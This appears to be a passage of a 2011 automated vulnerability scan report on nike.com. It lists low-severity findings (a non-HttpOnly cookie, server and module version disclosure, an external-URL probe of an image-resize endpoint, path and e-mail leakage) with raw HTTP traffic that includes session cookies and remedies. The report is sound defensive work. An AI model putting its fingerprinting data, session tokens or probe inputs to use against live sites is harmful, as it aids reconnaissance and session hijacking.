{ "id" : "email", "labelError" : "Invalid email, try again", "labelServerError" : "Email address is already taken", "validationType" : "email" },
{ "id" : "firstName", "required" : "no" },
{ "id" : "lastName", "required" : "no" },
{ "id" : "firstNameKana", "required" : "no" },
{ "id" : "lastNameKana", "required" : "no" },
{ "id" : "mobileNumber", "validationType" : "phone", "required" : "no" },
{ "id" : "education", "required" : "no" },
{ "id" : "career", "required" : "no" },
{ "id" : "favoriteSports", "required" : "no" },
{ "id" : "idNum", "required" : "no" }
], "change_password": [
{ "id" : "oldpassword", "labelError" : "Passwords do not match" },
{ "id" : "password", "labelError" : "Passwords do not match", "matchField" : "confirmPassword" },
{ "id" : "confirmPassword" },
], "secQuestion": [
{ "id" : "passwordQuestion" },
{ "id" : "passwordAnswer" }
]};
if(JQ.browser.safari){document.write("<style type='text/css'>#guts .form_off{min-height:48px;}#guts .select_container{margin: 0 0 15px 26px;}</style>");}
var unblockUI = false;
var startDate = new Date().getTime();
var MAX_WAIT_TIME = 60 * 1000;
JQ(document).ready(function(){
validateProtocol();
JQ.blockUI();
//Instantiate this page's querystring object
//f4a_id = 'f4a_nike';
f4a = new f4a_js_flash({'id':'f4a_nike','swfname':'f4a.swf','swfuri':'/nikeos/global/swf/f4a/f4a.swf'});
//set_flash_el(f4a_id);
f4a.createSwfObject();
var q = new Q();
q.init();
var intervalKey = window.setInterval(function(){
if (f4a.checkFlash()){
setUpClickToEditFields();
setUpSecurityQuestion();
createSmartLinks();
jsonifyAndPrepopulate();
JQ('#edit-screenName').keypress(function(e){ return blockNonAlphaNumericChars(e) });
JQ('#edit-firstName, #edit-lastName').keypress(function(e){ return blockNonAlphaNumericCharsAllowSpaces(e) });
JQ('#edit-mobileNumber').keypress(function(e){ return blockNonNumericChars(e) });
JQ('.save_button').click( function(){ trySubmit(JQ(this)) });
JQ('.cancel_button').click( function(){ cancelForm(JQ(this)) });
initForm("basic_info_form");
initForm("change_password");
initForm("secQuestion");
// trim piece
JQ('form').delegate("focusout", ":text", function(event){var trim = this.val(); this.val(trim.rtrim())});
profileImage.init();
embedFileUploader('uploader_swf_content');
EventBridge.addListener("onUploadFileSelect", uploadListener, "onUploadFileSelect");
EventBridge.addListener("onUploadCompleteData", uploadListener, "onUploadCompleteData");
EventBridge.addListener("onUploadProgress", uploadListener, "onUploadProgress");
EventBridge.addListener("onUploadIoError", uploadListener, "onUploadIoError");
window.clearInterval(intervalKey);
}
}, 100);
// create a loop for the onload event
var blockKey = window.setInterval(function(){
if (unblockUI){
setTimeout('JQ.unblockUI()',1200);
window.clearInterval(blockKey);
}
}, 100);
});
function setUpUploader(){
var so = new SWFObject("/nikeos/global/modules/profile_image_upload/v1/swf/uploader.swf", "uploader_swf", "20", "20", "9", "#000000");
so.addParam("scale", "noscale");
so.addParam("allowScriptAccess", "always");
so.addParam("allowFullScreen", "true");
so.addParam("wmode", "opaque");
so.addParam("menu", "false");
so.write("uploader_swf_content");
}
// SIFR header replacement
function minifieldH1() {
placeText('minifield_h1', 'nada', 600, 36, 'Victory-Neue Light', 36, '#e9e6e2', null, 'left', 'center', null, null, true, null, '/nikeos/global/swf/fonts/fontlibrary.swf');
}
var swooshCheck = false;
JQ.aop.after( {target: window, method: 'initialHandleProfileService'},
function() {
if(prof!=null){
var url = UPM.GET_PROFILE_IMAGE_URL;
var getProfileImageRequest = new swfAjaxRequest(url,'GET',{},function(data){
var response = JQ.xml2json(data);
if(response.status == 'success'){
if(response.response == 'none'){
JQ('#uploader_swf_content').css({zIndex:9999});
}
else {
profileImage.croppedImageURL = response.response;
JQ('#default_image').hide();
JQ('#new_image').css('background-image', 'url('+UPM.PROFILE_IMAGE_BASE_URL+profileImage.croppedImageURL+'_LRG.jpg)').show();
JQ('#delete_link').show();
JQ('#save_link, #upload_link').hide();
}
} else {
console.error('getprofileimage error...');
}
});
getProfileImageRequest.sendRequest();
}
if(!swooshCheck){
var isSwoosh = false;
var currentPage = location.href;
if(prof!=null){
isSwoosh = (prof.userType == 'swooshUser')?true:false;
}
if(isSwoosh){
url ='https://secure-niketown.nike.com/services/swooshVerification';
var data = 'benefitType=ManageFamily&action=isAccessible&profileId='+prof.id
var req = {'url':url,'meth':"POST",'data':data,'onready':function(data){
var swoosh = JQ.xml2json(data);
if((swoosh.status =='success') && (swoosh.isAccessible =='true')){
myFamilyHtml = '<li class="li_my_family"><a class="uppercase smart" href="swoosh?page=my_family">My Family</a></li>';
JQ('#subnavigation ul').append(myFamilyHtml);
}
}};
f4a.open(req);
} else {
//console.log('not swoosh user')
}
swooshCheck=true;
}//
}
);
//Tracking
if(typeof(window.tracker_obj)=='undefined'){var tracker_obj = {};}
tracker_obj['prop17']='profile';
tracker_obj['prop18']='profile';
tracker_obj['events']='event13';
// TRACKING defined in brand's profile.V2.html
page_tracker_obj=
{
prop17: ..
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /

/ CONFIRMED

http://www.nike.com/

Identified Cookie

AnalysisUserId

Request

GET / HTTP/1.1
Referer: http://www.nike.com/nikeos/p/nike/en_US/?ref=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nike.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Location: http://www.nike.com/nikeos/p/nike/language_select/
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 20
Content-Type: text/html
Expires: Mon, 18 Apr 2011 19:02:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 18 Apr 2011 19:02:23 GMT
Connection: keep-alive
Set-Cookie: AnalysisUserId=66.160.206.42.1303153343316183; path=/; expires=Tue, 17-Apr-12 19:02:23 GMT; domain=.nike.com,BSESSIONID=CbVNbLhxYnCIeM8XT7vNuQ**.sin-20-brand-1; Domain=.nike.com; Path=/


Apache Version Disclosure

Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /nikepro/global/css/nikepro.css

/nikepro/global/css/nikepro.css

http://www.nike.com/nikepro/global/css/nikepro.css

Extracted Version

Apache/2.2.10 (Unix)

Request

GET /nikepro/global/css/nikepro.css HTTP/1.1
Referer: http://www.nike.com/nikeos/p/nikepro/en_US/?sitesrc=uslp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nike.com
Cookie: AnalysisUserId=66.160.206.42.1303153343316183; BSESSIONID=CbVNbLhxYnCIeM8XT7vNuQ**.sin-20-brand-1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8i mod_jk/1.2.27
Last-Modified: Fri, 10 Apr 2009 17:07:47 GMT
ETag: "1290ca6-9f6-46736675ebec0"
Content-Type: text/css
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 696
Cache-Control: max-age=9905
Expires: Mon, 18 Apr 2011 22:02:14 GMT
Date: Mon, 18 Apr 2011 19:17:09 GMT
Connection: keep-alive


body { background-color:#000000;
background:url(/nikepro/global/images/bg/NikePro_Background.jpg) no-repeat #000; background-repeat: no-repeat;}

.nikepro_homepage
{
width:910px; height:620px;
}

.nikepro_homepage_center
{
width:910px;
height:auto;
background-color:#000000;
}

.nikepro_homepage_footer
{
padding:5px 0px 0px 0px;
}

.nikepro_homepage_footer_touts
{
height:122px;
}

.nikepro_homepage_footer_tout
{
padding:0px 0px 0px 1px;
float:left;
width:302px;
height:122px;
}

.nikepro_homepage_footer_sports
{

}

.nikepro_homepage_footer_sports#homepageTab
{
width:910px;
height:31px;
}

.nikepro_homepage_footer_sports_touts
{
height:150px;
}

.nikepro_homepage_footer_sports_tout
{
float:left;
height:150px;
padding-left: 26px;
}

/*grid*/

div#product_grid
{
width:910px;
background:repeat;
background-color:#000000;
height:100%;
}

.nikepro_products_header
{
width:910px;
height:143px;
background-image:url(/nikepro/global/images/bg/background_products_header.jpg);
}

.nikepro_products_header_nav
{
position:absolute;
top:104px;
width:270px;
height:39px;
}

.nikepro_products_filter_container
{
display:table;
float:left;
}

.nikepro_products_header_nav_button_normal
{
background-color:transparent;
text-align:center;
color:#A7A7DD;
font-size:8pt;
width:90px;
display:table-cell;

cursor:pointer;
height:39px;
}

.nikepro_products_header_nav_button_over .nikepro_header_nav_button_pad
{

}
.nikepro_products_header_nav_button_normal .nikepro_header_nav_button_pad:hover
{

color: #000;
}
.nikepro_header_nav_button_pad
{
margin: 10px;
line-height: 19px;
}
.nikepro_products_header_nav_button_over
{
background-color:#000;
text-align:center;
color:#0F0F1C;
font-size:8pt;
width:90px;
display:table-cell;

cursor:pointer;
height:39px;
}

.nikepro_products_grid_product
{
text-align:center;
vertical-align:middle;
width:182px;
height:300px;
float:left;
}



.nikepro_products_grid_product_loading
{
background:url(/nikepro/global/images/spinner.gif) no-repeat center center;
}

.nikepro_products_grid_product_name
{
padding:0px 10px 0px 10px;
text-align:center;
font-size:8pt;
color:#7c7abb;
}

.nikepro_products_grid_product_price
{
padding:5px 0px 0px 0px;
text-align:center;
font-size:11pt;
font-weight:bold;
color:#FFFFFF;
}

.nikepro_products_grid_product img
{
cursor:hand;
cursor:pointer;
}
OpenSSL Version Disclosure

OpenSSL Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing OpenSSL version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks.

Impact

An attacker can look for specific security vulnerabilities for the identified version. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /nikepro/global/css/nikepro.css

/nikepro/global/css/nikepro.css

http://www.nike.com/nikepro/global/css/nikepro.css

Extracted Version

OpenSSL/0.9.8i

Request

GET /nikepro/global/css/nikepro.css HTTP/1.1
Referer: http://www.nike.com/nikeos/p/nikepro/en_US/?sitesrc=uslp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nike.com
Cookie: AnalysisUserId=66.160.206.42.1303153343316183; BSESSIONID=CbVNbLhxYnCIeM8XT7vNuQ**.sin-20-brand-1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8i mod_jk/1.2.27
Last-Modified: Fri, 10 Apr 2009 17:07:47 GMT
ETag: "1290ca6-9f6-46736675ebec0"
Content-Type: text/css
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 696
Cache-Control: max-age=9905
Expires: Mon, 18 Apr 2011 22:02:14 GMT
Date: Mon, 18 Apr 2011 19:17:09 GMT
Connection: keep-alive


body { background-color:#000000;
background:url(/nikepro/global/images/bg/NikePro_Background.jpg) no-repeat #000; background-repeat: no-repeat;}

.nikepro_homepage
{
width:910px; height:620px;
}

.nikepro_homepage_center
{
width:910px;
height:auto;
background-color:#000000;
}

.nikepro_homepage_footer
{
padding:5px 0px 0px 0px;
}

.nikepro_homepage_footer_touts
{
height:122px;
}

.nikepro_homepage_footer_tout
{
padding:0px 0px 0px 1px;
float:left;
width:302px;
height:122px;
}

.nikepro_homepage_footer_sports
{

}

.nikepro_homepage_footer_sports#homepageTab
{
width:910px;
height:31px;
}

.nikepro_homepage_footer_sports_touts
{
height:150px;
}

.nikepro_homepage_footer_sports_tout
{
float:left;
height:150px;
padding-left: 26px;
}

/*grid*/

div#product_grid
{
width:910px;
background:repeat;
background-color:#000000;
height:100%;
}

.nikepro_products_header
{
width:910px;
height:143px;
background-image:url(/nikepro/global/images/bg/background_products_header.jpg);
}

.nikepro_products_header_nav
{
position:absolute;
top:104px;
width:270px;
height:39px;
}

.nikepro_products_filter_container
{
display:table;
float:left;
}

.nikepro_products_header_nav_button_normal
{
background-color:transparent;
text-align:center;
color:#A7A7DD;
font-size:8pt;
width:90px;
display:table-cell;

cursor:pointer;
height:39px;
}

.nikepro_products_header_nav_button_over .nikepro_header_nav_button_pad
{

}
.nikepro_products_header_nav_button_normal .nikepro_header_nav_button_pad:hover
{

color: #000;
}
.nikepro_header_nav_button_pad
{
margin: 10px;
line-height: 19px;
}
.nikepro_products_header_nav_button_over
{
background-color:#000;
text-align:center;
color:#0F0F1C;
font-size:8pt;
width:90px;
display:table-cell;

cursor:pointer;
height:39px;
}

.nikepro_products_grid_product
{
text-align:center;
vertical-align:middle;
width:182px;
height:300px;
float:left;
}



.nikepro_products_grid_product_loading
{
background:url(/nikepro/global/images/spinner.gif) no-repeat center center;
}

.nikepro_products_grid_product_name
{
padding:0px 10px 0px 10px;
text-align:center;
font-size:8pt;
color:#7c7abb;
}

.nikepro_products_grid_product_price
{
padding:5px 0px 0px 0px;
text-align:center;
font-size:11pt;
font-weight:bold;
color:#FFFFFF;
}

.nikepro_products_grid_product img
{
cursor:hand;
cursor:pointer;
}
Apache Module Version Disclosure

Apache Module Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing one of the Apache modules version. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can look for specific security vulnerabilities for the identified Apache module version. The attacker can also use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /nikepro/global/css/nikepro.css

/nikepro/global/css/nikepro.css

http://www.nike.com/nikepro/global/css/nikepro.css

Extracted Version

mod_jk/1.2.27

Request

GET /nikepro/global/css/nikepro.css HTTP/1.1
Referer: http://www.nike.com/nikeos/p/nikepro/en_US/?sitesrc=uslp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nike.com
Cookie: AnalysisUserId=66.160.206.42.1303153343316183; BSESSIONID=CbVNbLhxYnCIeM8XT7vNuQ**.sin-20-brand-1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8i mod_jk/1.2.27
Last-Modified: Fri, 10 Apr 2009 17:07:47 GMT
ETag: "1290ca6-9f6-46736675ebec0"
Content-Type: text/css
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 696
Cache-Control: max-age=9905
Expires: Mon, 18 Apr 2011 22:02:14 GMT
Date: Mon, 18 Apr 2011 19:17:09 GMT
Connection: keep-alive


body { background-color:#000000;
background:url(/nikepro/global/images/bg/NikePro_Background.jpg) no-repeat #000; background-repeat: no-repeat;}

.nikepro_homepage
{
width:910px; height:620px;
}

.nikepro_homepage_center
{
width:910px;
height:auto;
background-color:#000000;
}

.nikepro_homepage_footer
{
padding:5px 0px 0px 0px;
}

.nikepro_homepage_footer_touts
{
height:122px;
}

.nikepro_homepage_footer_tout
{
padding:0px 0px 0px 1px;
float:left;
width:302px;
height:122px;
}

.nikepro_homepage_footer_sports
{

}

.nikepro_homepage_footer_sports#homepageTab
{
width:910px;
height:31px;
}

.nikepro_homepage_footer_sports_touts
{
height:150px;
}

.nikepro_homepage_footer_sports_tout
{
float:left;
height:150px;
padding-left: 26px;
}

/*grid*/

div#product_grid
{
width:910px;
background:repeat;
background-color:#000000;
height:100%;
}

.nikepro_products_header
{
width:910px;
height:143px;
background-image:url(/nikepro/global/images/bg/background_products_header.jpg);
}

.nikepro_products_header_nav
{
position:absolute;
top:104px;
width:270px;
height:39px;
}

.nikepro_products_filter_container
{
display:table;
float:left;
}

.nikepro_products_header_nav_button_normal
{
background-color:transparent;
text-align:center;
color:#A7A7DD;
font-size:8pt;
width:90px;
display:table-cell;

cursor:pointer;
height:39px;
}

.nikepro_products_header_nav_button_over .nikepro_header_nav_button_pad
{

}
.nikepro_products_header_nav_button_normal .nikepro_header_nav_button_pad:hover
{

color: #000;
}
.nikepro_header_nav_button_pad
{
margin: 10px;
line-height: 19px;
}
.nikepro_products_header_nav_button_over
{
background-color:#000;
text-align:center;
color:#0F0F1C;
font-size:8pt;
width:90px;
display:table-cell;

cursor:pointer;
height:39px;
}

.nikepro_products_grid_product
{
text-align:center;
vertical-align:middle;
width:182px;
height:300px;
float:left;
}



.nikepro_products_grid_product_loading
{
background:url(/nikepro/global/images/spinner.gif) no-repeat center center;
}

.nikepro_products_grid_product_name
{
padding:0px 10px 0px 10px;
text-align:center;
font-size:8pt;
color:#7c7abb;
}

.nikepro_products_grid_product_price
{
padding:5px 0px 0px 0px;
text-align:center;
font-size:11pt;
font-weight:bold;
color:#FFFFFF;
}

.nikepro_products_grid_product img
{
cursor:hand;
cursor:pointer;
}
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /nikeos/global/jsp/imageresize.jsp

/nikeos/global/jsp/imageresize.jsp CONFIRMED

http://www.nike.com/nikeos/global/jsp/imageresize.jsp?url=http://www.netsparker.com?&dimension=191x105

Parameters

Parameter Type Value
url GET http://www.netsparker.com?
dimension GET 191x105

Request

GET /nikeos/global/jsp/imageresize.jsp?url=http://www.netsparker.com?&dimension=191x105 HTTP/1.1
Referer: http://www.nike.com/nikeos/p/nike/en_US/?ref=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nike.com
Cookie: AnalysisUserId=66.160.206.42.1303153343316183; BSESSIONID=CbVNbLhxYnCIeM8XT7vNuQ**.sin-20-brand-1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Server: Apache
Content-Length: 0
Content-Type: text/plain
Vary: Accept-Encoding
Expires: Mon, 18 Apr 2011 19:03:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 18 Apr 2011 19:03:39 GMT
Connection: keep-alive


E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /nikeos/global/js/jquery.cookie.js

/nikeos/global/js/jquery.cookie.js

http://www.nike.com/nikeos/global/js/jquery.cookie.js

Found E-mails

klaus.hartl@stilbuero.de

Request

GET /nikeos/global/js/jquery.cookie.js HTTP/1.1
Referer: http://www.nike.com/nikeos/p/nike/en_US/?ref=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nike.com
Cookie: AnalysisUserId=66.160.206.42.1303153343316183; BSESSIONID=CbVNbLhxYnCIeM8XT7vNuQ**.sin-20-brand-1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 28 May 2009 18:14:19 GMT
ETag: "11ae885-1096-46afcedb1d4c0"
Accept-Ranges: bytes
Content-Length: 4246
Content-Type: application/javascript
Expires: Mon, 18 Apr 2011 20:44:20 GMT
Date: Mon, 18 Apr 2011 19:02:25 GMT
Connection: keep-alive


/** * Cookie plugin * * Copyright (c) 2006 Klaus Hartl (stilbuero.de) * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * http://www.gnu.org/licenses/gpl.html * *//** * Create a cookie with the given name and value and other optional parameters. * * @example $.cookie('the_cookie', 'the_value'); * @desc Set the value of a cookie. * @example $.cookie('the_cookie', 'the_value', { expires: 7, path: '/', domain: 'jquery.com', secure: true }); * @desc Create a cookie with all available options. * @example $.cookie('the_cookie', 'the_value'); * @desc Create a session cookie. * @example $.cookie('the_cookie', null); * @desc Delete a cookie by passing null as value. Keep in mind that you have to use the same path and domain * used when the cookie was set. * * @param String name The name of the cookie. * @param String value The value of the cookie. * @param Object options An object literal containing key/value pairs to provide optional cookie attributes. * @option Number|Date expires Either an integer specifying the expiration date from now on in days or a Date object. * If a negative value is specified (e.g. a date in the past), the cookie will be deleted. * If set to null or omitted, the cookie will be a session cookie and will not be retained * when the the browser exits. * @option String path The value of the path atribute of the cookie (default: path of page that created the cookie). * @option String domain The value of the domain attribute of the cookie (default: domain of page that created the cookie). * @option Boolean secure If true, the secure attribute of the cookie will be set and the cookie transmission will * require a secure protocol (like HTTPS). * @type undefined * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de *//** * Get the value of a cookie with the given name. * * @example $.cookie('the_cookie'); * @desc Get the value of a cookie. * * @param String name The name of the cookie. * @return The value of the cookie. * @type String * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { // name and value given, set cookie options = options || {}; if (value === null) { value = ''; options.expires = -1; } var expires = ''; if (options.expires && (typeof options.expires == 'number' || options.expires.toUTCString)) { var date; if (typeof options.expires == 'number') { date = new Date(); date.setTime(date.getTime() + (options.expires * 24 * 60 * 60 * 1000)); } else { date = options.expires; } expires = '; expires=' + date.toUTCString(); // use expires attribute, max-age is not supported by IE } // CAUTION: Needed to parenthesize options.path and options.domain // in the following expressions, otherwise they evaluate to undefined // in the packed version for some reason... var path = options.path ? '; path=' + (options.path) : ''; var domain = options.domain ? '; domain=' + (options.domain) : ''; var secure = options.secure ? '; secure' : ''; document.cookie = [name, '=', encodeURIComponent(value), expires, path, domain, secure].join(''); } else { // only name given, get cookie var cookieValue = null; if (document.cookie && document.cookie != '') { var cookies = document.cookie.split(';'); for (var i = 0; i < cookies.length; i++) { var cookie = jQuery.trim(cookies[i]); // Does this cookie string begin with the name we want? if (cookie.substring(0, name.length + 1) == (name + '=')) { cookieValue = decodeURIComponent(cookie.substring(name.length + 1)); break; } } } return cookieValue; }};
[Possible] Internal Path Leakage (*nix)

[Possible] Internal Path Leakage (*nix)

5 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker during the exploitation of some other vulnerabilities.

Remediation

External References

- /nikefootball/home/

/nikefootball/home/

http://www.nike.com/nikefootball/home/?sitesrc=uslp&locale=en_US

Identified Internal Path(s)

/dev/i

Request

GET /nikefootball/home/?sitesrc=uslp&locale=en_US HTTP/1.1
Referer: http://www.nike.com/nikeos/p/nike/en_US/?ref=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nike.com
Cookie: AnalysisUserId=66.160.206.42.1303153343316183; BSESSIONID=CbVNbLhxYnCIeM8XT7vNuQ**.sin-20-brand-1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Encoding:
Content-Type: text/html;charset=utf-8
Content-Length: 12119
Cache-Control: max-age=80
Expires: Mon, 18 Apr 2011 19:17:56 GMT
Date: Mon, 18 Apr 2011 19:16:36 GMT
Connection: keep-alive


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta name="title" content="Nike Soccer - World-class soccer cleats. World-class pros."/>
<meta name="description" content="Nike Soccer is the home of the world’s most innovative soccer cleats, best players and all-conquering teams."/>
<meta name="keywords" content="nike soccer boots, soccer cleats, nike mercurial, nike t90, nike ctr360, nike 5, nikesoccer, cleats, soccer players, nike tiempo, cristiano ronaldo, cr9, wayne rooney, cesc fabregas, nike soccer training, barcelona, manchester united, man u, brazil, holland, usa, bootroom, boot finder, kit builder"/>
<meta http-equiv="imagetoolbar" content="no"/>
<meta http-equiv="X-UA-Compatible" content="chrome=1;IE=7" />
<meta name="search_section" content="general" />
<meta name="category" content="football" />
<meta name="locale" content="en_US" />
<link rel="shortcut icon" href="/nikefootball/assets/framework/images/favicon/favicon.ico"/>
<link rel="stylesheet" type="text/css" href="/nikefootball/assets/framework/v1/css/framework.css" />
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="/nikefootball/assets/framework/v1/css/framework-ie.css" />
<![endif]-->
<!--[if IE 6]>
<link rel="stylesheet" type="text/css" href="/nikefootball/assets/framework/v1/css/framework-ie6.css" />
<![endif]-->
<script type="text/javascript" src="/nikefootball/assets/framework/v1/js/lib/json2.min.js"></script>
<script type="text/javascript" src="/nikefootball/assets/framework/v1/js/lib/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="/nikefootball/assets/framework/v1/js/lib/jquery.cookie.js"></script>
<script type="text/javascript" src="/nikefootball/assets/framework/v1/js/lib/swfobject-1.5.js"></script>
<script type="text/javascript" src="/nikefootball/assets/framework/v1/js/lib/swfobject-2.1.js"></script>
<script type="text/javascript" src="/nikefootball/assets/framework/v1/plugins/videoplayer/jquery.videoplayer.js"></script>
<script type="text/javascript" src="/nikefootball/assets/framework/v1/js/lib/f4a_js.js"></script>
<script type="text/javascript" src="/nikeos/global/js/eventbridge.js"></script>
<script type="text/javascript" src="/nikefootball/assets/framework/v1/js/lib/cufon-yui-1.0.9.js"></script>
<script type="text/javascript">var fontFamily = "global";</script>
<script type="text/javascript" src="/nikefootball/assets/framework/v1/js/fonts/active/DIN.js"></script>
<script type="text/javascript">var fontFamily = "header";</script>
<script type="text/javascript" src="/nikefootball/assets/framework/v1/js/fonts/active/RHODES.js"></script>
<script type="text/javascript">var fontFamily = "body";</script>
<script type="text/javascript" src="/nikefootball/assets/framework/v1/js/fonts/active/HELVETICA.js"></script>
<script type="text/javascript">var fontFamily = "buttons";</script>
<script type="text/javascript" src="/nikefootball/assets/framework/v1/js/fonts/active/HELVETICA.js"></script>
<script type="text/javascript">var fontFamily = "brand";</script>
<script type="text/javascript" src="/nikefootball/assets/framework/v1/js/fonts/active/RHODES.js"></script>
<script type="text/javascript" src="/nikefootball/assets/framework/v1/js/framework.js"></script>
<script type="text/javascript" src="/nikefootball/assets/framework/v1/js/services.js"></script>
<script type="text/javascript">
// Switch JQuery to use $ as well as JQ for legacy purposes if switched on in config XML
var $ = jQuery;
var JQ = jQuery;
nf.gv.locale = "en_US";
nf.gv.language = "en";
nf.gv.country = "us";
nf.gv.textReplacement = true;
nf.gv.site_mode = "prod";
nf.gv.blog_base_url = "http://inside.nike.com";
nf.gv.base_url = "http://www.nike.com";
nf.gv.commerce_url = "http://store.nike.com";
nf.gv.base_secure_url = "https://www.nike.com";
nf.gv.social_url = "http://www.nikegadgets.com/";
nf.gv.social_secure_url = "https://secure-www.nikegadgets.com/";
nf.gv.upm_service_url = "https://www.nike.com/services/profileService";
nf.gv.services_urlPrefix = "/nsl";
nf.gv.trackingEnabled = true;
nf.gv.navigationItem = "home";
nf.gv.modals = {};
nf.gv.modals.global = {
close: 'Close'
};
nf.gv.modals.video = {
};
nf.gv.modals.tos = {
title: 'Terms and Conditions',
header: 'Terms of Use and Privacy Policy Update',
copy: 'Nike has expanded the features in the site you are visiting and we have updated our <a target="_blank" href="http://www.nike.com/privacy/index.jsp">Privacy Policy and Terms of Use</a>. To continue on to the site, please review the updated <a target="_blank" href="http://www.nike.com/privacy/index.jsp">Terms of Use and Privacy Policy</a> and select ACCEPT. If you do not want to accept the Terms of Use, select CANCEL to be logged out and returned to the Nike Soccer home page.',
cancel: 'CANCEL',
accept: 'ACCEPT'
};
nf.gv.useFontNames = false;
</script>
<style type="text/css">
body { background-image:url(/nikefootball/assets/images/common/bg-home.jpg); }
</style>
<script type="text/javascript" charset="utf-8">
// Updated on 15/4/2010 : NWH
// CAN BE REINSTATED AFTER SWFOBJECT 1.5 REMOVED
/*
var deconcept = {};
deconcept.SWFObjectUtil = {};
deconcept.SWFObjectUtil.getPlayerVersion = function(){
var flashVersion = swfobject.getFlashPlayerVersion();
var toReturn = { "major": flashVersion.major, "minor": flashVersion.minor, "rev": flashVersion.release };
return toReturn;
}
*/
/* NIKEOS */
if (!window.NIKEOS) var NIKEOS = {};
/*
SET THE SITE MODE
*/
if (location.host.match(/inside-staging/i) || location.host.match(/(env\d*)-brand/i) || location.host.match(/(ecn\d*)-www/i) || location.host.match(/dev/i))
NIKEOS.site_mode = 'staging';
else if (location.host.match(/nike\.com/i))
NIKEOS.site_mode = 'prod';
else if (location.host.match(/^[^\.]*$/i))
NIKEOS.site_mode = 'localhost';
else
